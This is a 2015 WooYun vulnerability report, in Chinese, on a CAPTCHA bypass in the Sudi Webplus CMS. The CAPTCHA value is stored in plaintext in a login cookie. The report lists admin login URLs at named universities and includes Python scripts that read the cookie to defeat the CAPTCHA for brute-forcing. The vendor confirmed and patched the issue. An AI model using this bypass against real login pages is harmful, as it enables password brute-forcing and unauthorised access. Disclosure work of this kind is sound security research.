当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111197

漏洞标题:苏迪Webplus网站群内容管理系统存在安全漏洞

相关厂商:苏迪科技

漏洞作者: chainhelen

提交时间:2015-05-05 10:37

修复时间:2015-08-03 12:18

公开时间:2015-08-03 12:18

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-05: 细节已通知厂商并且等待厂商处理中
2015-05-05: 厂商已经确认,细节仅向厂商公开
2015-05-08: 细节向第三方安全合作伙伴开放
2015-06-29: 细节向核心白帽子及相关领域专家公开
2015-07-09: 细节向普通白帽子公开
2015-07-19: 细节向实习白帽子公开
2015-08-03: 细节向公众公开

简要描述:

苏迪Webplus网站群内容管理系统,登录界面存在安全漏洞

详细说明:

webplus集群系统用户后台登陆界面,cookie里存在明文验证码,可直接过其验证码爆破。
无论是WebPlus 2008版的还是WebPlus EX3,都存在该问题。
多所高校甚至其官网都使用该系统。
南京农业大学登录界面:
http://webplus.njau.edu.cn/s/0/manage/main.jspy
贵州大学登录界面:
http://webplus.gzu.edu.cn/s/0/manage/main.jspy
厦门大学登陆界面:
http://webplus.xmu.edu.cn/s/0/manage/main.jspy
海洋大学登录界面:
http://www.ouc.edu.cn/login.jsp?_p=YXM9MSZwPTEmbT1OJg__
等等一系列高校。
特别地,其官网也使用该系统,地址如下
http://www.webplus.net.cn/s/0/main.jspy

漏洞证明:

1.就拿其官网来说明。
后台登录地址:http://www.webplus.net.cn/s/0/main.jspy
使用chrome打开上述官方网址,按F12,打开chrome调试工具。
在调试工具的Console中输入

document.cookie

回车,打印cookie,如下图。

linux.png


可以看见cookie中,有一个validateImageValue的值是一串数字,如下图

linux.png


可以看见这串数字就是其页面的验证码。

linux.jpg


2.以下是我的挫代码,只是测试海大的登录界面,是WebPlus EX3版本(需要python的requests库)
表单设置:登录用户名为22222,密码33333 ,验证码始终输入为“7890”,的时候

import requests
geturl = "http://www.ouc.edu.cn/_control/validateimage?tt=Wed%20Apr%2029%2019:48:07%20CST%202015"
r1 = requests.get(geturl)
validateCode = r1.cookies["validateImageValue"]
cookies = r1.cookies
posturl = "http://www.ouc.edu.cn/login.jsp?_p=YXM9MSZwPTEmbT1OJg__"
payload = {
"userName" : "22222",
"password" : "33333",
"isSubmitted" : '1',
"validateCode": "7890"
}
r2 = requests.post(posturl, data = payload, cookies = cookies)
print r2.text


如下图,登录错误弹窗提示“请输入正确的验证码“。

1.png


但是如果表单为:
用户名为22222,密码为33333,验证码为cookie中提取的值。

import requests
geturl = "http://www.ouc.edu.cn/_control/validateimage?tt=Wed%20Apr%2029%2019:48:07%20CST%202015"
r1 = requests.get(geturl)
validateCode = r1.cookies["validateImageValue"]
cookies = r1.cookies
posturl = "http://www.ouc.edu.cn/login.jsp?_p=YXM9MSZwPTEmbT1OJg__"
payload = {
"userName" : "22222",
"password" : "33333",
"isSubmitted" : '1',
"validateCode": validateCode
}
r2 = requests.post(posturl, data = payload, cookies = cookies)
print r2.text


如下图,登录错误弹窗只提示用户名或密码错误。

2.png


这样就过验证码可以爆破了。。

修复方案:

不要将验证码放在cookie中记录。

版权声明:转载请注明来源 chainhelen@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-05 12:16

厂商回复:

感谢作者提醒,问题已修复并及时对现场进行补丁。

最新状态:

暂无


漏洞评价:

评论